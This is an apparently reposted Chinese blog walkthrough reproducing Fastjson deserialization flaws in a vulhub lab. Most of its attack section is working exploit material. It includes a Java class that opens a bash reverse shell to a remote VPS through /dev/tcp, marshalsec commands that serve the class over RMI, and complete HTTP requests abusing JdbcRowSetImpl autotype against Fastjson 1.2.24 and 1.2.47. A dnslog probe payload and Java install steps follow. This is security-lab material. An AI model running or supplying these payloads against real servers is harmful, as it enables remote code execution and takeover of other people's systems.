当前位置:网站首页>漏洞複現-Fastjson 反序列化

漏洞複現-Fastjson 反序列化

2022-07-07 08:10:00 _s1mple

目錄

漏洞描述

漏洞複現

 漏洞利用

fastjson 1.2.24

fastjson 1.2.47

附錄

Fastjson漏洞探測

安裝java8


漏洞描述

fastjson提供了autotype功能,在請求過程中,我們可以在請求包中通過修改@type的值,來反序列化為指定的類型,而fastjson在反序列化過程中會設置和獲取類中的屬性,如果類中存在惡意方法,就會導致代碼執行等這類問題。

漏洞複現

這裏漏洞環境主要是用vulhub上的兩個fastjson漏洞搭建,搭建完成以後訪問8090端口會出現如下所示

 漏洞利用

我們需要在vps上開啟一個RMI服務調用class文件,首先我們創建test.java用來反彈shell,使用命令javac test.java編譯生成test.class(整個實驗環境都是基於java8的基礎上)

import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/59.110.xx.xx/8002 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

借助marshalsec項目開啟rmi服務,監聽9999端口,並制定加載遠程類test.class
我們首先需要編譯生成marshalsec-0.0.3-SNAPSHOT-all.jar

git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests

先啟一個http服務方便等會加載test.class

# python2
python2 -m SimpleHTTPServer
# python3 
python3 -m http.server

 然後我們再啟RMI服務監聽9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://59.110.xx.xx:8000/#test" 9999

本地服務器監聽文件裏的端口端口

nc -nvlp xxxx

以上所有操作均在同一臺服務器上完成

 

fastjson 1.2.24

POST / HTTP/1.1
Host: 139.196.xx.xx:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://59.110.xx.xx:9999/Test",
        "autoCommit":true
    }
}

fastjson 1.2.47

POST / HTTP/1.1
Host: 139.196.xx.xx:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://59.110.xx.xx:9999/test",
        "autoCommit":true
    }
}

附錄

Fastjson漏洞探測

DNS log

在http://dnslog.cn/隨機生成一個域名,然後構造payload

{"@type":"java.net.InetAddress","val":"dsunaw.dnslog.cn"}

將payload放在請求主體裏發送,假如dnslog有記錄則存在fastjson漏洞

 

安裝java8

下載地址:https://github.com/frekele/oracle-java/releases
下載jdk-8u221-linux-x64.tar.gz

OR

sudo apt-get install openjdk-8-jdk

卸載

# 查看安裝的OpenJDK包
dpkg --list | grep -i jdk
# 卸載OpenJDK相關包
apt-get purge openjdk-*
# 檢查所有 OpenJDK包是否都已卸載完畢
dpkg --list | grep -i jdk

安裝

# 將壓縮包放到/opt/java目錄下
mv jdk-8u212-linux-x64.tar.gz /opt/java

# 解壓
tar -zxvf jdk--8u212-linux-x64.tar.gz

# 配置環境變量
修改/etc/profile文件
vim /etc/profile
在文末追加如下信息
export JAVA_HOME=/opt/java/jdk1.8.0_212
export JRE_HOME=${JAVA_HOME}/jre  
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:${PATH}

# 使java環境生效
source /etc/profile

# 查看是否安裝成功 
java -version

 參考:Fastjson 反序列化漏洞複現_小白白@的博客-CSDN博客_fastjson反序列化漏洞複現

原网站

版权声明
本文为[_s1mple]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/188/202207070507141540.html